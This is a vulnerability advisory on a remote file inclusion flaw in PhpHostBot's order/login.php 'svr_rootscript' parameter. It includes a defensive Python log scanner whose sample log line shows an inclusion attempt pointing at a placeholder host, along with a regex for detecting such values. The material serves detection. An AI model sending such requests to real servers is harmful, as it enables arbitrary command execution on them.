A webware PHP application, PhpHostBot integrates with the cPanel (WHM) web hosting control panel to automate web hosting client account creation and billing. It supports PayPal subscriptions, free web hosting, sub-domain and reseller account setup. The web hosting automation features include automatic account creation and suspension (or complete termination) if your client cancels their hosting plan, fully automatic and instant client account creation (or optional account creation pending administrative approval), and account creation setup fail-safe, easy failure recovery and alerts.
A vulnerability has now been identified in PhpHostBot that could be exploited by remote attackers to compromise a vulnerable web server. The issue is caused by an input validation error in the "order/login.php" script when processing the "svr_rootscript" parameter. It can be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server. PhpHostBot versions 1.06 and prior are affected by this vulnerability. However, no official patch has yet been supplied to close the vulnerability.
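With no patch available, operators can at least review web server access logs for requests to "order/login.php" that supply "svr_rootscript" from the client side. The following is an added example, not code from the advisory or from PhpHostBot; it assumes Apache-style common/combined log lines, and the sample lines, addresses and dates are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common/combined log format: capture the client address and request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}')
SCRIPT = "/order/login.php"   # script named in the advisory
PARAM = "svr_rootscript"      # parameter named in the advisory
# Values that are not a plain relative path: scheme or wrapper prefix
# (http:, ftp:, php:, a drive letter), protocol-relative //, or a UNC path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)

def classify(line):
    """Return (client, severity, value) if the request sets PARAM, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.endswith(SCRIPT):
        return None
    # parse_qs percent-decodes once; unquote again to catch double encoding.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.split("[")[0] != PARAM:   # also matches the array form name[]
            continue
        value = unquote(values[-1])
        severity = "high" if REMOTE_RE.match(value) else "review"
        return client, severity, value
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2007:10:00:00 +0000] "GET /order/login.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2007:10:00:05 +0000] "GET /order/login.php'
    '?svr_rootscript=http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 90',
    '203.0.113.9 - - [01/Jan/2007:10:00:09 +0000] "GET /order/login.php'
    '?svr_rootscript=inc HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2007:10:00:12 +0000] "GET /index.php?page=order HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for client, severity, value in scan(SAMPLE_LOG):
        print(f"{severity:6} {client} {PARAM}={value!r}")
```

Access logs record only the query string, so values sent in a POST body are not visible to this check and need request-body logging or a filtering rule in front of the application.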




